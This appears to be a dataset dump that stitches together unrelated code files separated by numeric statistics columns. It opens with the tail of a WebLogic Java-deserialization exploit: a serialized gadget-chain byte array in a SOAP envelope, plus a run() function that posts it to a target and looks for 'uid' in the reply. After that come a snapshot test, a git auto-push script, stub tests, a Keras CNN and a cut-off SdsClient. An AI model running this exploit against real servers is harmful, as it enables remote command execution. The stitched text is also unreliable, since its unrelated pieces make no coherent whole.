<void index="3157"><byte>-52</byte></void>
<void index="3158"><byte>16</byte></void>
<void index="3159"><byte>67</byte></void>
<void index="3160"><byte>-53</byte></void>
<void index="3161"><byte>2</byte></void>
<void index="3162"><byte>0</byte></void>
<void index="3163"><byte>1</byte></void>
<void index="3164"><byte>76</byte></void>
<void index="3165"><byte>0</byte></void>
<void index="3166"><byte>1</byte></void>
<void index="3167"><byte>104</byte></void>
<void index="3168"><byte>116</byte></void>
<void index="3169"><byte>0</byte></void>
<void index="3170"><byte>37</byte></void>
<void index="3171"><byte>76</byte></void>
<void index="3172"><byte>106</byte></void>
<void index="3173"><byte>97</byte></void>
<void index="3174"><byte>118</byte></void>
<void index="3175"><byte>97</byte></void>
<void index="3176"><byte>47</byte></void>
<void index="3177"><byte>108</byte></void>
<void index="3178"><byte>97</byte></void>
<void index="3179"><byte>110</byte></void>
<void index="3180"><byte>103</byte></void>
<void index="3181"><byte>47</byte></void>
<void index="3182"><byte>114</byte></void>
<void index="3183"><byte>101</byte></void>
<void index="3184"><byte>102</byte></void>
<void index="3185"><byte>108</byte></void>
<void index="3186"><byte>101</byte></void>
<void index="3187"><byte>99</byte></void>
<void index="3188"><byte>116</byte></void>
<void index="3189"><byte>47</byte></void>
<void index="3190"><byte>73</byte></void>
<void index="3191"><byte>110</byte></void>
<void index="3192"><byte>118</byte></void>
<void index="3193"><byte>111</byte></void>
<void index="3194"><byte>99</byte></void>
<void index="3195"><byte>97</byte></void>
<void index="3196"><byte>116</byte></void>
<void index="3197"><byte>105</byte></void>
<void index="3198"><byte>111</byte></void>
<void index="3199"><byte>110</byte></void>
<void index="3200"><byte>72</byte></void>
<void index="3201"><byte>97</byte></void>
<void index="3202"><byte>110</byte></void>
<void index="3203"><byte>100</byte></void>
<void index="3204"><byte>108</byte></void>
<void index="3205"><byte>101</byte></void>
<void index="3206"><byte>114</byte></void>
<void index="3207"><byte>59</byte></void>
<void index="3208"><byte>120</byte></void>
<void index="3209"><byte>112</byte></void>
<void index="3210"><byte>115</byte></void>
<void index="3211"><byte>114</byte></void>
<void index="3212"><byte>0</byte></void>
<void index="3213"><byte>50</byte></void>
<void index="3214"><byte>115</byte></void>
<void index="3215"><byte>117</byte></void>
<void index="3216"><byte>110</byte></void>
<void index="3217"><byte>46</byte></void>
<void index="3218"><byte>114</byte></void>
<void index="3219"><byte>101</byte></void>
<void index="3220"><byte>102</byte></void>
<void index="3221"><byte>108</byte></void>
<void index="3222"><byte>101</byte></void>
<void index="3223"><byte>99</byte></void>
<void index="3224"><byte>116</byte></void>
<void index="3225"><byte>46</byte></void>
<void index="3226"><byte>97</byte></void>
<void index="3227"><byte>110</byte></void>
<void index="3228"><byte>110</byte></void>
<void index="3229"><byte>111</byte></void>
<void index="3230"><byte>116</byte></void>
<void index="3231"><byte>97</byte></void>
<void index="3232"><byte>116</byte></void>
<void index="3233"><byte>105</byte></void>
<void index="3234"><byte>111</byte></void>
<void index="3235"><byte>110</byte></void>
<void index="3236"><byte>46</byte></void>
<void index="3237"><byte>65</byte></void>
<void index="3238"><byte>110</byte></void>
<void index="3239"><byte>110</byte></void>
<void index="3240"><byte>111</byte></void>
<void index="3241"><byte>116</byte></void>
<void index="3242"><byte>97</byte></void>
<void index="3243"><byte>116</byte></void>
<void index="3244"><byte>105</byte></void>
<void index="3245"><byte>111</byte></void>
<void index="3246"><byte>110</byte></void>
<void index="3247"><byte>73</byte></void>
<void index="3248"><byte>110</byte></void>
<void index="3249"><byte>118</byte></void>
<void index="3250"><byte>111</byte></void>
<void index="3251"><byte>99</byte></void>
<void index="3252"><byte>97</byte></void>
<void index="3253"><byte>116</byte></void>
<void index="3254"><byte>105</byte></void>
<void index="3255"><byte>111</byte></void>
<void index="3256"><byte>110</byte></void>
<void index="3257"><byte>72</byte></void>
<void index="3258"><byte>97</byte></void>
<void index="3259"><byte>110</byte></void>
<void index="3260"><byte>100</byte></void>
<void index="3261"><byte>108</byte></void>
<void index="3262"><byte>101</byte></void>
<void index="3263"><byte>114</byte></void>
<void index="3264"><byte>85</byte></void>
<void index="3265"><byte>-54</byte></void>
<void index="3266"><byte>-11</byte></void>
<void index="3267"><byte>15</byte></void>
<void index="3268"><byte>21</byte></void>
<void index="3269"><byte>-53</byte></void>
<void index="3270"><byte>126</byte></void>
<void index="3271"><byte>-91</byte></void>
<void index="3272"><byte>2</byte></void>
<void index="3273"><byte>0</byte></void>
<void index="3274"><byte>2</byte></void>
<void index="3275"><byte>76</byte></void>
<void index="3276"><byte>0</byte></void>
<void index="3277"><byte>12</byte></void>
<void index="3278"><byte>109</byte></void>
<void index="3279"><byte>101</byte></void>
<void index="3280"><byte>109</byte></void>
<void index="3281"><byte>98</byte></void>
<void index="3282"><byte>101</byte></void>
<void index="3283"><byte>114</byte></void>
<void index="3284"><byte>86</byte></void>
<void index="3285"><byte>97</byte></void>
<void index="3286"><byte>108</byte></void>
<void index="3287"><byte>117</byte></void>
<void index="3288"><byte>101</byte></void>
<void index="3289"><byte>115</byte></void>
<void index="3290"><byte>116</byte></void>
<void index="3291"><byte>0</byte></void>
<void index="3292"><byte>15</byte></void>
<void index="3293"><byte>76</byte></void>
<void index="3294"><byte>106</byte></void>
<void index="3295"><byte>97</byte></void>
<void index="3296"><byte>118</byte></void>
<void index="3297"><byte>97</byte></void>
<void index="3298"><byte>47</byte></void>
<void index="3299"><byte>117</byte></void>
<void index="3300"><byte>116</byte></void>
<void index="3301"><byte>105</byte></void>
<void index="3302"><byte>108</byte></void>
<void index="3303"><byte>47</byte></void>
<void index="3304"><byte>77</byte></void>
<void index="3305"><byte>97</byte></void>
<void index="3306"><byte>112</byte></void>
<void index="3307"><byte>59</byte></void>
<void index="3308"><byte>76</byte></void>
<void index="3309"><byte>0</byte></void>
<void index="3310"><byte>4</byte></void>
<void index="3311"><byte>116</byte></void>
<void index="3312"><byte>121</byte></void>
<void index="3313"><byte>112</byte></void>
<void index="3314"><byte>101</byte></void>
<void index="3315"><byte>116</byte></void>
<void index="3316"><byte>0</byte></void>
<void index="3317"><byte>17</byte></void>
<void index="3318"><byte>76</byte></void>
<void index="3319"><byte>106</byte></void>
<void index="3320"><byte>97</byte></void>
<void index="3321"><byte>118</byte></void>
<void index="3322"><byte>97</byte></void>
<void index="3323"><byte>47</byte></void>
<void index="3324"><byte>108</byte></void>
<void index="3325"><byte>97</byte></void>
<void index="3326"><byte>110</byte></void>
<void index="3327"><byte>103</byte></void>
<void index="3328"><byte>47</byte></void>
<void index="3329"><byte>67</byte></void>
<void index="3330"><byte>108</byte></void>
<void index="3331"><byte>97</byte></void>
<void index="3332"><byte>115</byte></void>
<void index="3333"><byte>115</byte></void>
<void index="3334"><byte>59</byte></void>
<void index="3335"><byte>120</byte></void>
<void index="3336"><byte>112</byte></void>
<void index="3337"><byte>115</byte></void>
<void index="3338"><byte>114</byte></void>
<void index="3339"><byte>0</byte></void>
<void index="3340"><byte>17</byte></void>
<void index="3341"><byte>106</byte></void>
<void index="3342"><byte>97</byte></void>
<void index="3343"><byte>118</byte></void>
<void index="3344"><byte>97</byte></void>
<void index="3345"><byte>46</byte></void>
<void index="3346"><byte>117</byte></void>
<void index="3347"><byte>116</byte></void>
<void index="3348"><byte>105</byte></void>
<void index="3349"><byte>108</byte></void>
<void index="3350"><byte>46</byte></void>
<void index="3351"><byte>72</byte></void>
<void index="3352"><byte>97</byte></void>
<void index="3353"><byte>115</byte></void>
<void index="3354"><byte>104</byte></void>
<void index="3355"><byte>77</byte></void>
<void index="3356"><byte>97</byte></void>
<void index="3357"><byte>112</byte></void>
<void index="3358"><byte>5</byte></void>
<void index="3359"><byte>7</byte></void>
<void index="3360"><byte>-38</byte></void>
<void index="3361"><byte>-63</byte></void>
<void index="3362"><byte>-61</byte></void>
<void index="3363"><byte>22</byte></void>
<void index="3364"><byte>96</byte></void>
<void index="3365"><byte>-47</byte></void>
<void index="3366"><byte>3</byte></void>
<void index="3367"><byte>0</byte></void>
<void index="3368"><byte>2</byte></void>
<void index="3369"><byte>70</byte></void>
<void index="3370"><byte>0</byte></void>
<void index="3371"><byte>10</byte></void>
<void index="3372"><byte>108</byte></void>
<void index="3373"><byte>111</byte></void>
<void index="3374"><byte>97</byte></void>
<void index="3375"><byte>100</byte></void>
<void index="3376"><byte>70</byte></void>
<void index="3377"><byte>97</byte></void>
<void index="3378"><byte>99</byte></void>
<void index="3379"><byte>116</byte></void>
<void index="3380"><byte>111</byte></void>
<void index="3381"><byte>114</byte></void>
<void index="3382"><byte>73</byte></void>
<void index="3383"><byte>0</byte></void>
<void index="3384"><byte>9</byte></void>
<void index="3385"><byte>116</byte></void>
<void index="3386"><byte>104</byte></void>
<void index="3387"><byte>114</byte></void>
<void index="3388"><byte>101</byte></void>
<void index="3389"><byte>115</byte></void>
<void index="3390"><byte>104</byte></void>
<void index="3391"><byte>111</byte></void>
<void index="3392"><byte>108</byte></void>
<void index="3393"><byte>100</byte></void>
<void index="3394"><byte>120</byte></void>
<void index="3395"><byte>112</byte></void>
<void index="3396"><byte>63</byte></void>
<void index="3397"><byte>64</byte></void>
<void index="3398"><byte>0</byte></void>
<void index="3399"><byte>0</byte></void>
<void index="3400"><byte>0</byte></void>
<void index="3401"><byte>0</byte></void>
<void index="3402"><byte>0</byte></void>
<void index="3403"><byte>12</byte></void>
<void index="3404"><byte>119</byte></void>
<void index="3405"><byte>8</byte></void>
<void index="3406"><byte>0</byte></void>
<void index="3407"><byte>0</byte></void>
<void index="3408"><byte>0</byte></void>
<void index="3409"><byte>16</byte></void>
<void index="3410"><byte>0</byte></void>
<void index="3411"><byte>0</byte></void>
<void index="3412"><byte>0</byte></void>
<void index="3413"><byte>1</byte></void>
<void index="3414"><byte>116</byte></void>
<void index="3415"><byte>0</byte></void>
<void index="3416"><byte>8</byte></void>
<void index="3417"><byte>102</byte></void>
<void index="3418"><byte>53</byte></void>
<void index="3419"><byte>97</byte></void>
<void index="3420"><byte>53</byte></void>
<void index="3421"><byte>97</byte></void>
<void index="3422"><byte>54</byte></void>
<void index="3423"><byte>48</byte></void>
<void index="3424"><byte>56</byte></void>
<void index="3425"><byte>113</byte></void>
<void index="3426"><byte>0</byte></void>
<void index="3427"><byte>126</byte></void>
<void index="3428"><byte>0</byte></void>
<void index="3429"><byte>8</byte></void>
<void index="3430"><byte>120</byte></void>
<void index="3431"><byte>118</byte></void>
<void index="3432"><byte>114</byte></void>
<void index="3433"><byte>0</byte></void>
<void index="3434"><byte>29</byte></void>
<void index="3435"><byte>106</byte></void>
<void index="3436"><byte>97</byte></void>
<void index="3437"><byte>118</byte></void>
<void index="3438"><byte>97</byte></void>
<void index="3439"><byte>120</byte></void>
<void index="3440"><byte>46</byte></void>
<void index="3441"><byte>120</byte></void>
<void index="3442"><byte>109</byte></void>
<void index="3443"><byte>108</byte></void>
<void index="3444"><byte>46</byte></void>
<void index="3445"><byte>116</byte></void>
<void index="3446"><byte>114</byte></void>
<void index="3447"><byte>97</byte></void>
<void index="3448"><byte>110</byte></void>
<void index="3449"><byte>115</byte></void>
<void index="3450"><byte>102</byte></void>
<void index="3451"><byte>111</byte></void>
<void index="3452"><byte>114</byte></void>
<void index="3453"><byte>109</byte></void>
<void index="3454"><byte>46</byte></void>
<void index="3455"><byte>84</byte></void>
<void index="3456"><byte>101</byte></void>
<void index="3457"><byte>109</byte></void>
<void index="3458"><byte>112</byte></void>
<void index="3459"><byte>108</byte></void>
<void index="3460"><byte>97</byte></void>
<void index="3461"><byte>116</byte></void>
<void index="3462"><byte>101</byte></void>
<void index="3463"><byte>115</byte></void>
<void index="3464"><byte>0</byte></void>
<void index="3465"><byte>0</byte></void>
<void index="3466"><byte>0</byte></void>
<void index="3467"><byte>0</byte></void>
<void index="3468"><byte>0</byte></void>
<void index="3469"><byte>0</byte></void>
<void index="3470"><byte>0</byte></void>
<void index="3471"><byte>0</byte></void>
<void index="3472"><byte>0</byte></void>
<void index="3473"><byte>0</byte></void>
<void index="3474"><byte>0</byte></void>
<void index="3475"><byte>120</byte></void>
<void index="3476"><byte>112</byte></void>
<void index="3477"><byte>120</byte></void>
</array>
</void>
</array>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
'''
# HTTP headers for the probe requests; `ua` (the User-Agent string) is
# defined earlier in the file.
headers = {
    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",
    "User-Agent":ua,
    "Content-Type":"text/xml"
}
def run(rip,rport):
    """Probe one host for the WebLogic async-delivery Java deserialization flaw.

    POSTs the two SOAP payloads (``payload1``/``payload2``, defined earlier in
    the file) to ``path1``/``path2`` on ``http://rip:rport``, then fetches
    ``/_async/favicon.ico`` to look for the marker written by the second
    payload.

    Returns a ``(status, message)`` tuple: ``(1, ...)`` when the responses
    match the vulnerable pattern, ``(0, ...)`` otherwise.
    """
    r1 = requests.post('http://' + str(rip) + ':' + str(rport) + path1, headers=headers, data=payload1, timeout=3)
    time.sleep(1)
    r2 = requests.post('http://' + str(rip) + ':' + str(rport) + path2, headers=headers, data=payload2, timeout=3)
    time.sleep(1)
    # NOTE(review): unlike r1/r2 this request has no timeout and can hang
    # indefinitely on an unresponsive host — confirm whether that is intended.
    r3 = requests.get('http://' + str(rip) + ':' + str(rport) + '/_async/favicon.ico')
    # Vulnerable when the first probe's 200 response contains 'uid'
    # (presumably echoed output of an injected `id` command — TODO confirm
    # against payload1), or the second probe was accepted (202) and the marker
    # page reports 'Vulnerable'.
    if ((r1.status_code == 200) and 'uid' in r1.text) or ((r2.status_code == 202) and 'Vulnerable' in r3.text):
        return (1, '[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip + ':' + str(rport), VUL[0]))
    else:
        return (0, '[-] [{}] weblogic not detected {}'.format(rip + ':' + str(rport), VUL[0]))
if __name__ == '__main__':
    # CLI usage: python <script> <ip> <port>
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip,dport)
| 100.285474
| 205,599
| 0.644277
| 59,746
| 357,618
| 3.854919
| 0.08583
| 0.331683
| 0.44214
| 0.626366
| 0.970949
| 0.970714
| 0.12502
| 0.124759
| 0.124759
| 0.124759
| 0
| 0.147846
| 0.044665
| 357,618
| 3,566
| 205,600
| 100.285474
| 0.526292
| 0.000839
| 0
| 0.010443
| 0
| 0.001976
| 0.997589
| 0.911249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000282
| false
| 0
| 0.001129
| 0
| 0.001976
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7a83681a3652bcad54bbe3eaf86dff3d2e1b78b
| 1,690
|
py
|
Python
|
notification_importers/tests/snapshots/snap_test_notification_google_sheet_importer.py
|
City-of-Helsinki/palvelutarjotin
|
4ad67cbf4062832aba8080cb96ac785bdbbe9aa8
|
[
"MIT"
] | 2
|
2020-11-10T16:31:26.000Z
|
2021-02-19T10:33:27.000Z
|
notification_importers/tests/snapshots/snap_test_notification_google_sheet_importer.py
|
City-of-Helsinki/palvelutarjotin
|
4ad67cbf4062832aba8080cb96ac785bdbbe9aa8
|
[
"MIT"
] | 239
|
2020-04-23T07:36:17.000Z
|
2022-03-15T08:38:38.000Z
|
notification_importers/tests/snapshots/snap_test_notification_google_sheet_importer.py
|
City-of-Helsinki/palvelutarjotin
|
4ad67cbf4062832aba8080cb96ac785bdbbe9aa8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
# NOTE: auto-generated snapshot file — regenerate via the snapshottest tool
# rather than editing the string values by hand.
from __future__ import unicode_literals

from snapshottest import Snapshot

snapshots = Snapshot()

# Each value is a pipe-delimited dump of notification templates:
# type|fi subject|en subject|sv subject|fi body_text|en body_text|sv body_text|||
snapshots[
    "test_create_non_existing_and_update_existing_notifications 1"
] = """enrolment_approved|enrolment_approved fi updated subject|enrolment_approved en updated subject|enrolment_approved sv updated subject|enrolment_approved fi updated body_text|enrolment_approved en updated body_text|enrolment_approved sv updated body_text|||
occurrence_enrolment|occurrence_enrolment fi updated subject|occurrence_enrolment en updated subject|occurrence_enrolment sv updated subject|occurrence_enrolment fi updated body_text|occurrence_enrolment en updated body_text|occurrence_enrolment sv updated body_text|||"""

snapshots[
    "test_create_non_existing_notifications 1"
] = """enrolment_approved|enrolment_approved fi original subject|enrolment_approved en original subject|enrolment_approved sv original subject|enrolment_approved fi original body_text|enrolment_approved en original body_text|enrolment_approved sv original body_text|||
occurrence_enrolment|occurrence_enrolment fi updated subject|occurrence_enrolment en updated subject|occurrence_enrolment sv updated subject|occurrence_enrolment fi updated body_text|occurrence_enrolment en updated body_text|occurrence_enrolment sv updated body_text|||"""

snapshots[
    "test_update_notifications 1"
] = "enrolment_approved|enrolment_approved fi updated subject|enrolment_approved en updated subject|enrolment_approved sv updated subject|enrolment_approved fi updated body_text|enrolment_approved en updated body_text|enrolment_approved sv updated body_text|||"
| 76.818182
| 272
| 0.856805
| 217
| 1,690
| 6.359447
| 0.16129
| 0.258696
| 0.130435
| 0.134783
| 0.823913
| 0.744928
| 0.744928
| 0.744928
| 0.697101
| 0.697101
| 0
| 0.003891
| 0.087574
| 1,690
| 21
| 273
| 80.47619
| 0.891051
| 0.036686
| 0
| 0.357143
| 0
| 0.357143
| 0.884923
| 0.617846
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7b8acdd3370e337e8d3cc4e74982bfc51053ac6
| 678
|
py
|
Python
|
updateSite.py
|
letsgoexploring/miscellaneous-python-code
|
20e0b4f87ec7cdbcd7a7b44f236ce9b71f7cf0ee
|
[
"MIT"
] | null | null | null |
updateSite.py
|
letsgoexploring/miscellaneous-python-code
|
20e0b4f87ec7cdbcd7a7b44f236ce9b71f7cf0ee
|
[
"MIT"
] | null | null | null |
updateSite.py
|
letsgoexploring/miscellaneous-python-code
|
20e0b4f87ec7cdbcd7a7b44f236ce9b71f7cf0ee
|
[
"MIT"
] | null | null | null |
import os

# The repositories live under one of two possible home directories (the
# machine's username differs).  The original code ran the whole command
# sequence for "brianjenkins" and, on any failure, repeated it verbatim for
# "bcjenkin" under a bare `except:` — which both duplicated the code and
# silently swallowed unrelated errors.  Instead, pick the first base
# directory that actually exists and publish each repo once.
_USERS = ("brianjenkins", "bcjenkin")
_REPOS = ("teaching", "data")


def _publish(repo_dir):
    """Stage, commit and push everything in *repo_dir* (best-effort: the git
    commands' exit codes are ignored, matching the original behavior)."""
    os.chdir(repo_dir)
    os.system("git add -A")
    os.system("git commit -m \"automatic update\"")
    os.system("git push")


for _user in _USERS:
    _base = "/Users/{}/dropbox/github".format(_user)
    if os.path.isdir(_base):
        for _repo in _REPOS:
            _publish(os.path.join(_base, _repo))
        break
| 29.478261
| 59
| 0.638643
| 96
| 678
| 4.510417
| 0.21875
| 0.221709
| 0.30485
| 0.12933
| 0.960739
| 0.960739
| 0.812933
| 0.812933
| 0.812933
| 0.812933
| 0
| 0
| 0.175516
| 678
| 23
| 60
| 29.478261
| 0.774598
| 0
| 0
| 0.631579
| 0
| 0
| 0.424153
| 0.22975
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7dbec119983a08116764fa60b4e2e2e2618c232
| 1,952
|
py
|
Python
|
tests/unit/database/test_database.py
|
matthewgdv/sqlhandler
|
b82fd159195f6bb63175bb8a8d81fc421e7d5835
|
[
"MIT"
] | null | null | null |
tests/unit/database/test_database.py
|
matthewgdv/sqlhandler
|
b82fd159195f6bb63175bb8a8d81fc421e7d5835
|
[
"MIT"
] | null | null | null |
tests/unit/database/test_database.py
|
matthewgdv/sqlhandler
|
b82fd159195f6bb63175bb8a8d81fc421e7d5835
|
[
"MIT"
] | null | null | null |
# import pytest
class TestDatabase:
    """Auto-generated placeholder tests for a Database class.

    Every method is a stub that only asserts True; the trailing '# synced'
    markers appear to be consumed by a test-synchronization tool — TODO
    confirm, and do not edit them by hand.
    """

    def test___call__(self): # synced
        assert True

    def test_default_schema(self): # synced
        assert True

    def test_schema_names(self): # synced
        assert True

    def test_table_names(self): # synced
        assert True

    def test_view_names(self): # synced
        assert True

    def test_create_table(self): # synced
        assert True

    def test_drop_table(self): # synced
        assert True

    def test_refresh_table(self): # synced
        assert True

    def test_exists_table(self): # synced
        assert True

    def test_reset(self): # synced
        assert True

    def test__get_metadata(self): # synced
        assert True

    def test__cache_metadata(self): # synced
        assert True

    def test__post_reshape_soon(self): # synced
        assert True

    def test__sync_with_db(self): # synced
        assert True

    def test__reflect_database(self): # synced
        assert True

    def test__reflect_schema(self): # synced
        assert True

    def test__reflect_object(self): # synced
        assert True

    def test__autoload_models(self): # synced
        assert True

    def test_cls_instrument(self): # synced
        assert True

    def test__remove_expired_metadata_objects(self): # synced
        assert True

    def test__remove_object_if_exists(self): # synced
        assert True

    def test__name_from_object(self): # synced
        assert True

    def test__normalize_table(self): # synced
        assert True

    def test__table_name(self): # synced
        assert True

    def test_table_name(self): # synced
        assert True

    def test__scalar_name(self): # synced
        assert True

    def test_scalar_name(self): # synced
        assert True

    def test__collection_name(self): # synced
        assert True

    def test_collection_name(self): # synced
        assert True
| 21.450549
| 62
| 0.639344
| 241
| 1,952
| 4.838174
| 0.190871
| 0.174099
| 0.397942
| 0.497427
| 0.823328
| 0.823328
| 0.707547
| 0.212693
| 0.212693
| 0.212693
| 0
| 0
| 0.300205
| 1,952
| 90
| 63
| 21.688889
| 0.853587
| 0.110656
| 0
| 0.491525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.491525
| 1
| 0.491525
| false
| 0
| 0
| 0
| 0.508475
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1bea211d9508477c8b9d4c53639b655123df5f08
| 1,669
|
py
|
Python
|
cnn.py
|
KiLJ4EdeN/signal_models
|
ebb607bb9e94d6a0913716e4fb1ca7dde4b692c3
|
[
"MIT"
] | null | null | null |
cnn.py
|
KiLJ4EdeN/signal_models
|
ebb607bb9e94d6a0913716e4fb1ca7dde4b692c3
|
[
"MIT"
] | null | null | null |
cnn.py
|
KiLJ4EdeN/signal_models
|
ebb607bb9e94d6a0913716e4fb1ca7dde4b692c3
|
[
"MIT"
] | null | null | null |
import tensorflow as tf

# (filters, kernel_size) for each double-Conv1D stage; every stage except the
# last is followed by a MaxPooling1D(pool_size=2).
_CONV_STAGES = [(2, 15), (4, 13), (8, 11), (16, 9), (24, 7), (36, 5), (48, 3)]

inputs = tf.keras.layers.Input(shape=(2000, 1))
x = inputs
for stage_index, (n_filters, k_size) in enumerate(_CONV_STAGES):
    # Two identical valid-padded convolutions per stage.
    x = tf.keras.layers.Conv1D(filters=n_filters, kernel_size=k_size, padding='valid')(x)
    x = tf.keras.layers.Conv1D(filters=n_filters, kernel_size=k_size, padding='valid')(x)
    if stage_index < len(_CONV_STAGES) - 1:
        x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)
# Head: global average pooling, flatten, then a sigmoid unit for binary output.
x = tf.keras.layers.GlobalAveragePooling1D()(x)
x = tf.keras.layers.Flatten()(x)
x = tf.keras.layers.Dense(1, activation='sigmoid')(x)
model = tf.keras.models.Model(inputs=inputs, outputs=x, name='cnn-1d')
print(model.summary())
| 52.15625
| 78
| 0.720791
| 284
| 1,669
| 4.165493
| 0.165493
| 0.147929
| 0.263736
| 0.272189
| 0.846154
| 0.820795
| 0.820795
| 0.820795
| 0.820795
| 0.820795
| 0
| 0.049869
| 0.086878
| 1,669
| 31
| 79
| 53.83871
| 0.726378
| 0
| 0
| 0.642857
| 0
| 0
| 0.04973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035714
| 0
| 0.035714
| 0.035714
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40163c37b269ff674b40494efc1a1b6d1b5431f6
| 48,412
|
py
|
Python
|
basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
|
hanhossain/OCS-Samples
|
6f0f7878e6d9bccc32b6d663446678e070859d14
|
[
"Apache-2.0"
] | null | null | null |
basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
|
hanhossain/OCS-Samples
|
6f0f7878e6d9bccc32b6d663446678e070859d14
|
[
"Apache-2.0"
] | null | null | null |
basic_samples/SDS/Python/SDSPy/Python2/SdsClient.py
|
hanhossain/OCS-Samples
|
6f0f7878e6d9bccc32b6d663446678e070859d14
|
[
"Apache-2.0"
] | null | null | null |
# SdsClient.py
#
# Copyright (C) 2018 OSIsoft, LLC. All rights reserved.
#
# THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF
# OSIsoft, LLC. USE, DISCLOSURE, OR REPRODUCTION IS PROHIBITED WITHOUT
# THE PRIOR EXPRESS WRITTEN PERMISSION OF OSIsoft, LLC.
#
# RESTRICTED RIGHTS LEGEND
# Use, duplication, or disclosure by the Government is subject to restrictions
# as set forth in subparagraph (c)(1)(ii) of the Rights in Technical Data and
# Computer Software clause at DFARS 252.227.7013
#
# OSIsoft, LLC
# 1600 Alvarado St, San Leandro, CA 94577
import urlparse
import json
import adal as adal
from SdsError import SdsError
from SdsType import SdsType
from SdsStream import SdsStream
from SdsStreamView import SdsStreamView
from SdsStreamViewMap import SdsStreamViewMap
from SdsBoundaryType import SdsBoundaryType
from Dataview import Dataview
from Datagroup import Datagroup
import requests
import time
class SdsClient(object):
"""Handles communication with Sds Service"""
def __init__(self, apiVersion, tenant, url, resource, authority, clientId, clientSecret):
    """Store connection and credential settings, fetch an initial auth token,
    and build the URL path/query templates used by every request.
    """
    self.__apiVersion = apiVersion
    self.__tenant = tenant
    self.__url = url
    self.__resource = resource
    self.__clientId = clientId
    self.__clientSecret = clientSecret
    self.__authority = authority
    self.__token = ""       # presumably populated by __getToken() — defined outside this view
    self.__expiration = 0   # presumably a token expiry marker; 0 forces the initial fetch
    self.__getToken()
    self.__setPathAndQueryTemplates()
@property
def Uri(self):
    """Base URL of the Sds Service this client talks to."""
    return self.__url
def getType(self, namespace_id, type_id):
    """Retrieve the SdsType identified by `type_id` from the Sds Service.

    Raises TypeError when a required id is None and SdsError when the
    service answers with a non-2xx status.
    """
    if namespace_id is None:
        raise TypeError
    if type_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get SdsType, {type_id}. {status}:{reason}".
                       format(type_id=type_id, status=response.status_code, reason=response.text))
    # Renamed local from `type`, which shadowed the builtin of the same name.
    sds_type = SdsType.fromJson(json.loads(response.content))
    response.close()
    return sds_type
def getTypeReferenceCount(self, namespace_id, type_id):
    """Return (as int) the number of times the type `type_id` is referenced.

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if type_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id) + "/ReferenceCount",
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get SdsType reference count, {type_id}. {status}:{reason}".
                       format(type_id=type_id, status=response.status_code, reason=response.text))
    count = json.loads(response.content)
    response.close()
    return int(count)
def getTypes(self, namespace_id, skip=0, count=100):
    """Fetch a page (`skip`/`count`) of SdsTypes under `namespace_id`."""
    if namespace_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getTypesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
        headers=self.__sdsHeaders())
    succeeded = 200 <= response.status_code < 300
    if not succeeded:
        response.close()
        raise SdsError("Failed to get all SdsTypes. {status}:{reason}".
                       format(status=response.status_code, reason=response.text))
    raw_entries = json.loads(response.content)
    parsed = [SdsType.fromJson(entry) for entry in raw_entries]
    response.close()
    return parsed
def getOrCreateType(self, namespace_id, type):
    """POST the local SdsType `type`; the service creates it, or returns the
    existing definition when a matching type is already registered.

